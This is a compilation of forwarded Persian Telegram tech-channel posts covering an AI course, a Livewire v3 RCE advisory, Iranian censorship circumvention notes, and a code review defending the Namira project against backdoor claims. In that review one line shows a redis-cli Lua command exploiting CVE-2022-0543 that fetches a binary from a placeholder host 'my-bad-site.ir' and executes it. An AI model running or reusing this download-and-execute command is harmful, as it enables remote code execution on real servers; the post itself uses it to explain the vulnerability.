Forwarded from ذهن زیبا - A beautiful Mind
دوره سیستمسازی با کمک هوش مصنوعی رسما شروع شد
اولین ویدئو آپلود شد:
https://youtu.be/qA39G0n0hcc
و هر چیزی که در ویدئو توضیح داده میشه در گیتهاب هم قرار میگیره که میتونید از اونجا برش دارید و متناسب با کیسهای خودتون ازش استفاده کنید.
در قسمت اول، صرفا یه کاری کردیم هوش مصنوعی بهمون بگه چقدر بلندپروازیم. ولی در قسمتهای بعدی، این موضوع رو بهتر و بهتر هم خواهیم کرد.
@haghiri75_blog
اولین ویدئو آپلود شد:
https://youtu.be/qA39G0n0hcc
و هر چیزی که در ویدئو توضیح داده میشه در گیتهاب هم قرار میگیره که میتونید از اونجا برش دارید و متناسب با کیسهای خودتون ازش استفاده کنید.
در قسمت اول، صرفا یه کاری کردیم هوش مصنوعی بهمون بگه چقدر بلندپروازیم. ولی در قسمتهای بعدی، این موضوع رو بهتر و بهتر هم خواهیم کرد.
@haghiri75_blog
YouTube
Build Systems With AI - Part 1 - سیستمسازی با کمک هوش مصنوعی - برنامهریزی شخصی
در این ویدیو مقدمهای میبینیم از ساخت سیستم با کمک هوش مصنوعی، اول ایدهها و چالشهامون رو میگیم و هوش مصنوعی هم چیز میکنه به هیکلمون :)))
Links in the video:
- Telegram Channel: https://t.iss.one/haghiri75_blog
- Github: https://github.com/prp-e/ai_syste…
Links in the video:
- Telegram Channel: https://t.iss.one/haghiri75_blog
- Github: https://github.com/prp-e/ai_syste…
Forwarded from ⚝ (Amiria Maher)
Telegram
میسانو
بیاید از تجربیات یه توزیع دیگه به نام قارچ لینوکس رو روسیه بگم که شبیه پارچ هست وضعیتش :
۴ سال پیش روسها تصمیم گرفتن یه توزیع بزنن برای خودشون به نام قارچ، اسم توسعه دهنده این توزیع قارچدانی بود که بر پایه آرچ بود، میخوایم به دلایل ناموفق بودن این پروژه…
۴ سال پیش روسها تصمیم گرفتن یه توزیع بزنن برای خودشون به نام قارچ، اسم توسعه دهنده این توزیع قارچدانی بود که بر پایه آرچ بود، میخوایم به دلایل ناموفق بودن این پروژه…
Forwarded from 🎄 یک برنامه نویس تنبل (Lazy 🌱)
Forwarded from laravel-news
❌آسیبپذیری امنیتی Livewire v3 (GHSA-29cq-5w36-x7w3)❌
تاثیر و خطر:
در Livewire v3 (≤ 3.6.3) یک آسیبپذیری وجود دارد که به مهاجمان غیرمجاز اجازه اجرای دستورات از راه دور را میدهد.
احتیاج به احراز هویت ندارد - مهاجم بدون لاگین کردن میتواند حمله کند
نیاز به تعامل کاربر ندارد - خودکار قابل اجرا است
مختص Livewire v3 - نسخههای قبلی مشکل ندارند
علت مشکل:
مشکل از نحوه hydration یا بازسازی property های component ها نشأت میگیرد. یعنی وقتی Livewire میخواهد وضعیت component را بهروزرسانی کند، در فرآیند بازسازی دادهها خطایی وجود دارد.
نسخههای آسیبپذیر:
Livewire v3.0.0-beta.1 تا v3.6.3
اطلاعات بیشتر
https://github.com/advisories/GHSA-29cq-5w36-x7w3?ref=securinglaravel.com
⚠️ لایووایر تون رو به نسخه ی `v3.6.4` ارتقا بدید. ⚠️
در این کامیت فیکس شده https://github.com/livewire/livewire/commit/ef04be759da41b14d2d129e670533180a44987dc
تاثیر و خطر:
در Livewire v3 (≤ 3.6.3) یک آسیبپذیری وجود دارد که به مهاجمان غیرمجاز اجازه اجرای دستورات از راه دور را میدهد.
احتیاج به احراز هویت ندارد - مهاجم بدون لاگین کردن میتواند حمله کند
نیاز به تعامل کاربر ندارد - خودکار قابل اجرا است
مختص Livewire v3 - نسخههای قبلی مشکل ندارند
علت مشکل:
مشکل از نحوه hydration یا بازسازی property های component ها نشأت میگیرد. یعنی وقتی Livewire میخواهد وضعیت component را بهروزرسانی کند، در فرآیند بازسازی دادهها خطایی وجود دارد.
نسخههای آسیبپذیر:
Livewire v3.0.0-beta.1 تا v3.6.3
اطلاعات بیشتر
https://github.com/advisories/GHSA-29cq-5w36-x7w3?ref=securinglaravel.com
⚠️ لایووایر تون رو به نسخه ی `v3.6.4` ارتقا بدید. ⚠️
در این کامیت فیکس شده https://github.com/livewire/livewire/commit/ef04be759da41b14d2d129e670533180a44987dc
GitHub
Fix property update hydration · livewire/livewire@ef04be7
A full-stack framework for Laravel that takes the pain out of building dynamic UIs. - Fix property update hydration · livewire/livewire@ef04be7
Forwarded from دستاوردهای یادگیری عمیق(InTec)
تیم groq با این پست از
با سرعت
اما مشکل اصلی کند بودنش بود که
۴۰ برابر سرعت بیشتر؛ روی پروژه جدیدم این مدل رو دقیق تست میکنم و با
نتایجش رو میذارم حتماً (امیدوارم گراک نسخه بزرگش رو دپلوی کرده باشه)
توی تست mini دقیقاً میشه گفت near-realtime هست 😂😂🤯🤯🤯
Artificial Analysis خبر از انتشار Kimi k2 روی پلتفرم خودش داد با سرعت
40x؛ اگر مدل رو تست کرده باشید میدونید توی تسکهای کد فوقالعاده هست با اینکه thinking نیست.اما مشکل اصلی کند بودنش بود که
Groq اون رو حل کرده ۴۰ برابر سرعت بیشتر؛ روی پروژه جدیدم این مدل رو دقیق تست میکنم و با
Gemini2.5 Pro مقایسه خواهم کرد.نتایجش رو میذارم حتماً (امیدوارم گراک نسخه بزرگش رو دپلوی کرده باشه)
توی تست mini دقیقاً میشه گفت near-realtime هست 😂😂🤯🤯🤯
Forwarded from linuxtnt(linux tips and tricks) (hosein seilany https://seilany.ir/)
🌐روسیه در آستانه ممنوعسازی واتساپ بهدلیل تهدیدات امنیتی
🔹 به گزارش وبینو، مجلس دومای روسیه طرحی را بررسی میکند که میتواند به ممنوعیت کامل واتساپ در این کشور منجر شود.
🔸بهگفته یکی از اعضای کمیته سیاست اطلاعاتی دومای روسیه، این پیامرسان تحت مالکیت متا، «تهدیدی برای امنیت ملی» است و باید خود را برای خروج از بازار روسیه آماده کند.
🔹 این اقدام در ادامه راهبرد کلان روسیه برای کاهش نفوذ پلتفرمهای غربی و توسعه پیامرسانهای بومی همچون «MAX» است.
🔸بهموجب قانونی که اخیراً توسط پوتین امضا شده، استفاده از نرمافزارهای ساخت کشورهای «غیردوست» از اول سپتامبر ۲۰۲۵ با محدودیتهایی همراه خواهد شد.
🔹 تحلیلگران میگویند روسیه در مسیر «حاکمیت دیجیتال کامل» گام برمیدارد و احتمالاً واتساپ نخستین پلتفرمی است که این سیاست بر روی آن اجرا خواهد شد.
🔸 چندی پیش نیز کنگره آمریکا استفاده از واتساپ را بهدلایل امنیتی ممنوع کرده بود.
🔹 به گزارش وبینو، مجلس دومای روسیه طرحی را بررسی میکند که میتواند به ممنوعیت کامل واتساپ در این کشور منجر شود.
🔸بهگفته یکی از اعضای کمیته سیاست اطلاعاتی دومای روسیه، این پیامرسان تحت مالکیت متا، «تهدیدی برای امنیت ملی» است و باید خود را برای خروج از بازار روسیه آماده کند.
🔹 این اقدام در ادامه راهبرد کلان روسیه برای کاهش نفوذ پلتفرمهای غربی و توسعه پیامرسانهای بومی همچون «MAX» است.
🔸بهموجب قانونی که اخیراً توسط پوتین امضا شده، استفاده از نرمافزارهای ساخت کشورهای «غیردوست» از اول سپتامبر ۲۰۲۵ با محدودیتهایی همراه خواهد شد.
🔹 تحلیلگران میگویند روسیه در مسیر «حاکمیت دیجیتال کامل» گام برمیدارد و احتمالاً واتساپ نخستین پلتفرمی است که این سیاست بر روی آن اجرا خواهد شد.
🔸 چندی پیش نیز کنگره آمریکا استفاده از واتساپ را بهدلایل امنیتی ممنوع کرده بود.
Forwarded from DevTwitter | توییت برنامه نویسی
اپلیکیشن Next.js خودتون رو به یک موشک تبدیل کنید!
اپلیکیشن Next.js شما گاهی کندتر از انتظارتون عمل میکنه؟ نگران نباشید، این مشکل خیلی از توسعهدهندههاست. خبر خوب اینه که Next.js ابزارهای فوقالعادهای داره تا اپلیکیشنتون رو به یه موشک تبدیل کنه. فقط کافیه بدونید چطور ازشون استفاده کنید!
در دنیای دیجیتال امروز، هر میلیثانیه حساب میشه. سرعت پایین یعنی تجربه کاربری ضعیف، سئوی بدتر و از دست دادن کاربر. بیاید با هم پرفورمنس Next.js رو یک بار برای همیشه بهینه کنیم.
این شما و این چند تکنیک کلیدی:
۱. جادوی Server و Client Components رو آزاد کنید
- سلاح مخفی شما: Server Components
روی سرور رندر میشن و هیچ JavaScript اضافی به کاربر نمیفرستن. برای محتوای استاتیک و لود سریع عالیان!
- با دقت از Client Components استفاده کنید
فقط برای تعاملات کاربر لازمن. تا حد امکان کوچکشون کنید و پایین درخت کامپوننتها بذاریدشون.
۲. با Caching هوشمند، سرعت رو به اوج برسونید
- از کشینگ داخلی Next.js استفاده کنید تا صفحات در چند میلیثانیه لود بشن.
- با تنظیم تازگی کش، همیشه محتوای بهروز داشته باشید.
۳. با Code Splitting، بار اولیه رو سبک کنید
- کامپوننتهای سنگین رو فقط وقتی لود کنید که کاربر بهشون نیاز داره.
- اینطوری لود اولیه مثل برق میشه!
@DevTwitter | <Mahdi bagheri/>
اپلیکیشن Next.js شما گاهی کندتر از انتظارتون عمل میکنه؟ نگران نباشید، این مشکل خیلی از توسعهدهندههاست. خبر خوب اینه که Next.js ابزارهای فوقالعادهای داره تا اپلیکیشنتون رو به یه موشک تبدیل کنه. فقط کافیه بدونید چطور ازشون استفاده کنید!
در دنیای دیجیتال امروز، هر میلیثانیه حساب میشه. سرعت پایین یعنی تجربه کاربری ضعیف، سئوی بدتر و از دست دادن کاربر. بیاید با هم پرفورمنس Next.js رو یک بار برای همیشه بهینه کنیم.
این شما و این چند تکنیک کلیدی:
۱. جادوی Server و Client Components رو آزاد کنید
- سلاح مخفی شما: Server Components
روی سرور رندر میشن و هیچ JavaScript اضافی به کاربر نمیفرستن. برای محتوای استاتیک و لود سریع عالیان!
- با دقت از Client Components استفاده کنید
فقط برای تعاملات کاربر لازمن. تا حد امکان کوچکشون کنید و پایین درخت کامپوننتها بذاریدشون.
۲. با Caching هوشمند، سرعت رو به اوج برسونید
- از کشینگ داخلی Next.js استفاده کنید تا صفحات در چند میلیثانیه لود بشن.
- با تنظیم تازگی کش، همیشه محتوای بهروز داشته باشید.
۳. با Code Splitting، بار اولیه رو سبک کنید
- کامپوننتهای سنگین رو فقط وقتی لود کنید که کاربر بهشون نیاز داره.
- اینطوری لود اولیه مثل برق میشه!
@DevTwitter | <Mahdi bagheri/>
Forwarded from Golang Insights (Javad)
🧬 فصل ششم ژنریک (Generics)
پس از سه ماه در کنار کارهایم بخش ششم ژنریک ها را کامل کردم این بخش یکی از جذاب ترین بخش ها بود که سعی کردم خیلی عمیق بپردازم و الان آماده اس برای مطالعه. امیدوارم این مطلب برایتان مفید واقع شود.
https://book.gofarsi.ir/chapter-6/
درصورتیکه کتاب را میخواهید از بصورت آفلاین استفاده کنید می توانید آخرین نسخه desktop را دانلود را با اجرای نسخه قبلی به نسخه جدید آپدیت نمایید.
https://github.com/GoFarsi/book/releases
➖➖➖➖➖➖➖➖
⚡️@GoInsights | @GolangEngineers
پس از سه ماه در کنار کارهایم بخش ششم ژنریک ها را کامل کردم این بخش یکی از جذاب ترین بخش ها بود که سعی کردم خیلی عمیق بپردازم و الان آماده اس برای مطالعه. امیدوارم این مطلب برایتان مفید واقع شود.
https://book.gofarsi.ir/chapter-6/
درصورتیکه کتاب را میخواهید از بصورت آفلاین استفاده کنید می توانید آخرین نسخه desktop را دانلود را با اجرای نسخه قبلی به نسخه جدید آپدیت نمایید.
https://github.com/GoFarsi/book/releases
در ضمن مشارکت در کتاب آزاد است و جای تجربیات شما خالی است اگر مایل بودین می توانید تجربیات خود را در کتاب به اشتراک بزارید.
https://github.com/GoFarsi/book/blob/main/COUNTRIBUTING.md
➖➖➖➖➖➖➖➖
⚡️@GoInsights | @GolangEngineers
Forwarded from SoniaCircuit
OpenGFW
پروژهای برای شبیهسازی فایروال چین (که توی ایران یه ورژن ضعیف تری ازش هم هست). میتونین روی روتر یا لینوکستون اجرا کنین. و باهاش فیلترینگ دمدستی راه بندازین.
—-
این پروژه رو تیم apernet توسعه داده که قبلا پروژه hysteria هم توسعه دادن
https://github.com/apernet
—-
دقت کنید که این یه شبیه سازی هستش و هنوز قابلیت هایی مثل Machine learning based traffic classification که در زیرساخت ازش استفاده میشه هنوز روی این پروژه پیاده سازی نشده.
#OpenGFW
پروژهای برای شبیهسازی فایروال چین (که توی ایران یه ورژن ضعیف تری ازش هم هست). میتونین روی روتر یا لینوکستون اجرا کنین. و باهاش فیلترینگ دمدستی راه بندازین.
—-
این پروژه رو تیم apernet توسعه داده که قبلا پروژه hysteria هم توسعه دادن
https://github.com/apernet
—-
دقت کنید که این یه شبیه سازی هستش و هنوز قابلیت هایی مثل Machine learning based traffic classification که در زیرساخت ازش استفاده میشه هنوز روی این پروژه پیاده سازی نشده.
#OpenGFW
GitHub
GitHub - apernet/hysteria: Hysteria is a powerful, lightning fast and censorship resistant proxy.
Hysteria is a powerful, lightning fast and censorship resistant proxy. - apernet/hysteria
Forwarded from IRCF | اینترنت آزاد برای همه
#گزارش
کلودفلر زیر سایهی تغییرات جدید فایروال فیلترینگ
بر اساس بررسیهای ناکر (GFW-Knocker)، همهی آیپیهای عادی کلودفلر توی تغییرات جدید فایروال فیلترینگ وایتلیست شدن؛ یعنی فقط SNI سایتهای معروف اجازهی عبور دارن و بقیهی سایتها و دامنههای شخصی مسدود هستند؛ چه با فرگمنت، چه بدون فرگمنت. فیلتر باشند یا نباشند، اجازه عبور ندارند.
در پورت ۴۴۳، سایتهای غیرمعروف کلاً بستهشدن و حتی دامنهی شخصی فیلترنشده هم مسدوده. تازه اگه یه سایت معروف رو هم با روش فرگمنت بفرستی، چون فایروال نمیتونه اسم دامنه رو درست ببینه، اونم مسدود میشه. خلاصه اینکه تا فایروال مطمئن نشه که دامنه، تو لیست مجازه، اتصال رو ادامه نمیده، حتی اگر مرورگر عادی و یک سایت عادی باشه.
در پورت ۸۰، پروتکل ws کامل بسته شده. اگر توی پکت کلمهی websocket باشه، اونم فیلتر میشه. اگه دیتارو هم تکهتکه بفرستی، از پکت هفتم به بعد دیگه عبور نمیکنه.
خب، حالا باید چی کار کرد؟ جواب اصلی واضحه؛ آزادی ایران. ولی تا وقتی اون اتفاق نیفته، راه دیگه استفاده از انواع روشها با رمزناشناختگیه؛ یعنی trickهایی که اگر عمومی مطرح بشن توسط فیلترچی مسدود میشن.
برای پورت ۸۰ کلودفلر، کانفیگ xhttp packet-up بدون TLS با دامنهای که هنوز فیلتر نشده و fakeHost هم توی هسته مهسا روشن باشه، جواب میده. البته احتمال فیلترشدن دامنه وجود داره. و خبر خوب اینه که بهزودی هستهی مهسا آپدیت میشه تا این مدل کانفیگ با دامنهی فیلترشده روی همهی آیپیهای کلودفلر کار کنه.
برای پورت ۴۴۳ کلودفلر، چون رنجهای کلودفلر وایتلیست شدن، تقریبا تفاوتی با قطع ندارن و کار خاصی نمیشه کرد. البته یهسری گزینه هست مثل استفاده از اسکنرها، متد ECH، دستکاری ClientHello یا درخواست از مدیران کلودفلر برای فعال کردن Domain Fronting، ولی احتمال موفقیت کمه.
🔍 ircf.space
@ircfspace
کلودفلر زیر سایهی تغییرات جدید فایروال فیلترینگ
بر اساس بررسیهای ناکر (GFW-Knocker)، همهی آیپیهای عادی کلودفلر توی تغییرات جدید فایروال فیلترینگ وایتلیست شدن؛ یعنی فقط SNI سایتهای معروف اجازهی عبور دارن و بقیهی سایتها و دامنههای شخصی مسدود هستند؛ چه با فرگمنت، چه بدون فرگمنت. فیلتر باشند یا نباشند، اجازه عبور ندارند.
در پورت ۴۴۳، سایتهای غیرمعروف کلاً بستهشدن و حتی دامنهی شخصی فیلترنشده هم مسدوده. تازه اگه یه سایت معروف رو هم با روش فرگمنت بفرستی، چون فایروال نمیتونه اسم دامنه رو درست ببینه، اونم مسدود میشه. خلاصه اینکه تا فایروال مطمئن نشه که دامنه، تو لیست مجازه، اتصال رو ادامه نمیده، حتی اگر مرورگر عادی و یک سایت عادی باشه.
در پورت ۸۰، پروتکل ws کامل بسته شده. اگر توی پکت کلمهی websocket باشه، اونم فیلتر میشه. اگه دیتارو هم تکهتکه بفرستی، از پکت هفتم به بعد دیگه عبور نمیکنه.
خب، حالا باید چی کار کرد؟ جواب اصلی واضحه؛ آزادی ایران. ولی تا وقتی اون اتفاق نیفته، راه دیگه استفاده از انواع روشها با رمزناشناختگیه؛ یعنی trickهایی که اگر عمومی مطرح بشن توسط فیلترچی مسدود میشن.
برای پورت ۸۰ کلودفلر، کانفیگ xhttp packet-up بدون TLS با دامنهای که هنوز فیلتر نشده و fakeHost هم توی هسته مهسا روشن باشه، جواب میده. البته احتمال فیلترشدن دامنه وجود داره. و خبر خوب اینه که بهزودی هستهی مهسا آپدیت میشه تا این مدل کانفیگ با دامنهی فیلترشده روی همهی آیپیهای کلودفلر کار کنه.
برای پورت ۴۴۳ کلودفلر، چون رنجهای کلودفلر وایتلیست شدن، تقریبا تفاوتی با قطع ندارن و کار خاصی نمیشه کرد. البته یهسری گزینه هست مثل استفاده از اسکنرها، متد ECH، دستکاری ClientHello یا درخواست از مدیران کلودفلر برای فعال کردن Domain Fronting، ولی احتمال موفقیت کمه.
🔍 ircf.space
@ircfspace
Forwarded from محتوای آزاد سهراب
دارم یک مطلب مینویسم برای نصب سریع یک دبیان مینیمال روی Qemu.
به محض اینکه آماده بشه لینکش رو اینجا قرار میدم.
@SohrabContents
به محض اینکه آماده بشه لینکش رو اینجا قرار میدم.
@SohrabContents
Forwarded from lou's bs
من واقعاً فکر نمیکنم نیاز باشه تمام سورس کد رو بشکافم براتون تا همینجا فکر کنم پرونده این داستان بسته شده که نامیرا چیه و هیچ ربطی به سرور هایی که شما ترافیک نازنین گرامی خود رو بهشون میفرستید نداره :)
Forwarded from lou's bs
خب به این فانکشن جنجالی بپردازیم اول خودش رو براتون باز میکنم بعد کاملا با security based perspective میام بررسیش میکنیم و بعدش پرونده حاشیه های پشت نامیرا رو میبندیم امیدوارم یک بار برای همیشه!
handleScan()
کارش چیه ؟
یه فلوی ساده داره واقعا
میاد اول کانفیگ هارو میخونه حالا چه multipart باشن جه json که ما میگیم به این کار content negotiation
تو مرحله بعدی داریم از قدرت ردیس استفاده میکنیم برای Deduplication
سپس جاب ها ساخته میشن و سابمیت میکنیم به worker pool
خب ساده بود نه؟ درسته منطق اصلی واقعا پیچیده تر از اینه ولی اره تو نگاه ابسترکت واقعا ساده است
تنها مشکلی هم که ممکنه باشه در اصل مشکل نیست چون تو لاجیک های دیگه ای که داریم ما این بحث رو هندل کردیم که آقا به اندازه منابع سیستم بیایم از ریسورس استفاده کنیم !
حالا آقا آیا عملا backdoor ممکنه تو این کد؟ رسما خیر چرا ممکنه نیست ؟ چون آسیب پذیری هایی که منجر به lua sandbox escape میشن عملا حداقل شناخته هاشون پچ شدن !
چه آسیب پذیری هایی ؟
CVE-2022-0543
CVE-2024-31449
نتیجتا backdoor بی backdoor !!!
نکته بعدی آقا به پیر به پیغمبر باید یه جایی باشه که به c2 وصل شه یه آدرسی باید موجود باشه که وقتی شما میای اینو سلف هاست میکنی ترافیک به اون آدرس بره و بیاد
من حتی لازم نبود تمام اینارو توضیح بدم این خیلی ساده قابل تشخیص بود
و نکته بعدی این دو آسیب پذیری رسما به این نیاز دارن ما بیایم از lua توی گو استفاده کنیم :)
به قاعده اگه این بود توی سورس مشخص میشد.
حتی اگه یه روز حال داشتم یه سورس آسیب پذیر نوشتم اینو به چشم ببینید :)
نکات بدی من با تیم نامیرا صحبت میکنم که حتی یه سری hardening هایی که نیاز هم بهشون نیست مثل بهره بری از ACL configuration
که بیان least privilege رو علنی دیگه نشون بدن
اجبار برای پسورد قوی
خاموش کردن کامند هایی مثل SLAVEOF
روشن کردن redis protected mode
خیال همه رو راحت تر کنن
هرچند واقعاً نیازی نیست اما امان از تخم شک :)
همچین کسی که داره هر پروژه رو سلف هاست میکنه باید بدونه چجوری سیستمشو harden کنه :)
اگه بخوام هم با خود redis cli بهتون یه نمونه روی CVE-2022-0543
نشون بدم
چیکار میکنه این کد؟ از آسیب پذیری ردیس استفاده میشه واسه RCE :)
handleScan()
کارش چیه ؟
یه فلوی ساده داره واقعا
میاد اول کانفیگ هارو میخونه حالا چه multipart باشن جه json که ما میگیم به این کار content negotiation
تو مرحله بعدی داریم از قدرت ردیس استفاده میکنیم برای Deduplication
سپس جاب ها ساخته میشن و سابمیت میکنیم به worker pool
خب ساده بود نه؟ درسته منطق اصلی واقعا پیچیده تر از اینه ولی اره تو نگاه ابسترکت واقعا ساده است
تنها مشکلی هم که ممکنه باشه در اصل مشکل نیست چون تو لاجیک های دیگه ای که داریم ما این بحث رو هندل کردیم که آقا به اندازه منابع سیستم بیایم از ریسورس استفاده کنیم !
حالا آقا آیا عملا backdoor ممکنه تو این کد؟ رسما خیر چرا ممکنه نیست ؟ چون آسیب پذیری هایی که منجر به lua sandbox escape میشن عملا حداقل شناخته هاشون پچ شدن !
چه آسیب پذیری هایی ؟
CVE-2022-0543
CVE-2024-31449
نتیجتا backdoor بی backdoor !!!
نکته بعدی آقا به پیر به پیغمبر باید یه جایی باشه که به c2 وصل شه یه آدرسی باید موجود باشه که وقتی شما میای اینو سلف هاست میکنی ترافیک به اون آدرس بره و بیاد
من حتی لازم نبود تمام اینارو توضیح بدم این خیلی ساده قابل تشخیص بود
و نکته بعدی این دو آسیب پذیری رسما به این نیاز دارن ما بیایم از lua توی گو استفاده کنیم :)
به قاعده اگه این بود توی سورس مشخص میشد.
حتی اگه یه روز حال داشتم یه سورس آسیب پذیر نوشتم اینو به چشم ببینید :)
نکات بدی من با تیم نامیرا صحبت میکنم که حتی یه سری hardening هایی که نیاز هم بهشون نیست مثل بهره بری از ACL configuration
که بیان least privilege رو علنی دیگه نشون بدن
اجبار برای پسورد قوی
خاموش کردن کامند هایی مثل SLAVEOF
روشن کردن redis protected mode
خیال همه رو راحت تر کنن
هرچند واقعاً نیازی نیست اما امان از تخم شک :)
همچین کسی که داره هر پروژه رو سلف هاست میکنه باید بدونه چجوری سیستمشو harden کنه :)
اگه بخوام هم با خود redis cli بهتون یه نمونه روی CVE-2022-0543
نشون بدم
redis-cli --eval 'os.execute("curl -O https://my-bad-site.ir/redigo; chmod +x redigo; redigo")'چیکار میکنه این کد؟ از آسیب پذیری ردیس استفاده میشه واسه RCE :)
Forwarded from lou's bs
یه نکته کلی رو هم راجع بحث api پروژه بگم
آقا این api core هستش یعنی قرار توسط خود شما (هرکی میخواد سلف هاست کنه ) استفاده شه در نتیجه دوستان و یاران عزیزم input sanitization دستی داخلش انجام نشده یه سری چک انجام شده فقط توسط خود xray که من نخوندم سورس کتابخونه رو!
آقا این api core هستش یعنی قرار توسط خود شما (هرکی میخواد سلف هاست کنه ) استفاده شه در نتیجه دوستان و یاران عزیزم input sanitization دستی داخلش انجام نشده یه سری چک انجام شده فقط توسط خود xray که من نخوندم سورس کتابخونه رو!
Forwarded from lou's bs
قبل از این که به این بحث ادامه بدم یه نکته ای رو خواستم مجددا یاد آوری کنم
نامیرا هیچ سرور وی پی ان و پراکسی ای نساخته و اصلا کارش این نیست!
نامیرا ترافیک شما رو نمیبینه
نامیرا اصلا دسترسی به سرور هایی که توی output خودش ارائه میده نداره عزیزانم.
نامیرا نه سرور وی پی ان هست و نه خواهد بود تا جایی که من اطلاع دارم!
پس کارش چیه ؟
کانفیگ هایی که دیگران میسازند و پابلیک میکنن رو تست میکنه که آیا وصل هستن یا نه !
این کارو ولی به نحو احسن انجام میده!
چرا دارم اینو میگم؟ این که آیا استفاده از کانفیگ های پراکسی به شکل کلی امن هست یا نه کاملا یه بحث دیگس و ابدا رو دوش نامیرا نیست !
نامیرا هیچ سرور وی پی ان و پراکسی ای نساخته و اصلا کارش این نیست!
نامیرا ترافیک شما رو نمیبینه
نامیرا اصلا دسترسی به سرور هایی که توی output خودش ارائه میده نداره عزیزانم.
نامیرا نه سرور وی پی ان هست و نه خواهد بود تا جایی که من اطلاع دارم!
پس کارش چیه ؟
کانفیگ هایی که دیگران میسازند و پابلیک میکنن رو تست میکنه که آیا وصل هستن یا نه !
این کارو ولی به نحو احسن انجام میده!
چرا دارم اینو میگم؟ این که آیا استفاده از کانفیگ های پراکسی به شکل کلی امن هست یا نه کاملا یه بحث دیگس و ابدا رو دوش نامیرا نیست !
Forwarded from lou's bs
در ادامه یه فانکشن رو تو همین فایل بررسی میکنم که سرش بحث بود فانکشن handleScan
Forwarded from lou's bs
تو ادامه فایل handler.go دوتا فانکشن هم داریم که تازه به کد اضافه شدن و خشنودم که الان دارم بررسی میکنم این پروژه رو
startBackgroundRefresh()
performBackgroundRefresh()
خب به ترتیب اینارو هم بشکافیم با هم اگه موافق اید (مگه میشه نباشید؟)
اولا بگم جفت اینا نوشته شدن تا بیان یه بررسی کانفیگوریشن انجام بدن به شکل منظم و مداوم و بتونیم به سادگی کش ردیس رو فلاش کنیم
ورک فلو رو هم بخوام ساده بگم استارتر میاد یه ticker میسازه و یه گو روتین ساخته میشه شروع میکنه به گوش کردن به چنل ها
h.refreshTicker.C
h.refreshDone
و بسته به این که کدوم کیس رو داریم میاد background refresh میده و یا استاپ میکنه
لاجیک پرفورم هم که مشخصه !
درسته این روش مشکلات خودشو داره مثل این که هیچ راهی تعریف نشده تا بیایم یه refresh Synchronization داشته باشیم جهت چی ؟ حهت این که اطمینان داشه باشیم رفرش کامل شده قبل ذخیره نتایج
ولی آقا این نهایت یه باگ بی خطره نه بک دور !
به سادگی هم قابل حله.
یه نکته ای هم که من شخصا باهاش مشکل دارم اینه که این روش تمام سرویس api رو بلاک میکنه تا رفرش انجام بشه !
یه نکته خیلی ظریف ام که فقط پیشنهاده اینه که به جای پروسس کردن تمام کانفیگ تو یه سینگل جاب اونارو چانک چانک کنیم :)
یه سیستم atomic کنار staged refreshing , locked time out ,dry run mechanism هم خیلی خوب میتونست جمع کنه کارو ولی یادمون باشه این پروژه تحت فشار نوشته شده!
اینم کد این دوتا فانکشنه:
https://github.com/NaMiraNet/namira-core/blob/8fdcb828411d232749dd760daccd721e590204e5/internal/api/handler.go#L75C1-L146C2
startBackgroundRefresh()
performBackgroundRefresh()
خب به ترتیب اینارو هم بشکافیم با هم اگه موافق اید (مگه میشه نباشید؟)
اولا بگم جفت اینا نوشته شدن تا بیان یه بررسی کانفیگوریشن انجام بدن به شکل منظم و مداوم و بتونیم به سادگی کش ردیس رو فلاش کنیم
ورک فلو رو هم بخوام ساده بگم استارتر میاد یه ticker میسازه و یه گو روتین ساخته میشه شروع میکنه به گوش کردن به چنل ها
h.refreshTicker.C
h.refreshDone
و بسته به این که کدوم کیس رو داریم میاد background refresh میده و یا استاپ میکنه
لاجیک پرفورم هم که مشخصه !
درسته این روش مشکلات خودشو داره مثل این که هیچ راهی تعریف نشده تا بیایم یه refresh Synchronization داشته باشیم جهت چی ؟ حهت این که اطمینان داشه باشیم رفرش کامل شده قبل ذخیره نتایج
ولی آقا این نهایت یه باگ بی خطره نه بک دور !
به سادگی هم قابل حله.
یه نکته ای هم که من شخصا باهاش مشکل دارم اینه که این روش تمام سرویس api رو بلاک میکنه تا رفرش انجام بشه !
یه نکته خیلی ظریف ام که فقط پیشنهاده اینه که به جای پروسس کردن تمام کانفیگ تو یه سینگل جاب اونارو چانک چانک کنیم :)
یه سیستم atomic کنار staged refreshing , locked time out ,dry run mechanism هم خیلی خوب میتونست جمع کنه کارو ولی یادمون باشه این پروژه تحت فشار نوشته شده!
اینم کد این دوتا فانکشنه:
https://github.com/NaMiraNet/namira-core/blob/8fdcb828411d232749dd760daccd721e590204e5/internal/api/handler.go#L75C1-L146C2
GitHub
namira-core/internal/api/handler.go at 8fdcb828411d232749dd760daccd721e590204e5 · NamiraNet/namira-core
Contribute to NamiraNet/namira-core development by creating an account on GitHub.
Forwarded from lou's bs
نکته:
هر نکته ای که اینجا بگم به بچه های تیم نامیرا هم اطلاع میدم.
همینجوری که گفتیم میایم اول پکیج api نامیرا رو بررسی میکنیم.
این پکیج سه تا فایل داره
handler.go
router.go
types.go
اول بگم بهتون این سه تا فایل و کلا این پکیج دارن چیکار میکنن
تیم نامیرا اومده یه Restful api رو پیاده کرد و endpoint هایی رو ساخته به جهت کنترل جاب ها و یه لاجیک worker pool هم جداگانه نوشته شده برای پردازش موازی.
این بچه ها اومدن از redis استفاده کردن به جهت چی؟ دوتا اصطلاح مهم داریم واسه کاری که باهاش میکنن
deduplication
results caching
میتونید اینارو سرچ کنید ولی self-explanatory
هستن واقعاً
یه بخش ما لاجیک داریم برای GitHub integration که میتونیم با استفاده ازش نتایج رو ذخیره کنیم تو گیت هاب
و یه health monitoring logic هم پیاده شده برای endpoint ها
بعد بیایم handler.go اصلی رو بررسی کنیم
تو بخش ایمپورت ها اگه توجه کنید میبیند از ورژن 9 گو ردیس استفاده شده که هیچ یک از آسیب پذیری های که دارن باهاش نامیرا رو متهم میکنن داخلش نیست
من اون آسیب پذیری ها رو هم کاملا براتون باز میکنم و حتی بهتون نشون میدم چجوری هیچ بک دوری در کار نبوده و نیست :)
https://github.com/NaMiraNet/namira-core/blob/8fdcb828411d232749dd760daccd721e590204e5/internal/api/handler.go#L17C2-L17C32
اولین بحش های لاجیکال فایل به تعاریف constant ها و type ها میرسیم
یه constant برای ذخیره سازی TTL ردیس
یه استراکت برای نگه داری نتایج تسک ها
دوتا فانکشن تایپ داریم که بیاد از نتایج پروسس رو تایپ بده بهشون
و یکی دیگه ام برای کانفیگ هایی که مثبت بودن بعد از چک
اینجا کد رو ببینید:
https://github.com/NaMiraNet/namira-core/blob/8fdcb828411d232749dd760daccd721e590204e5/internal/api/handler.go#L23C1-L30C49
بعد توی کد میرسیم به استراکچر اصلی برای هندلر
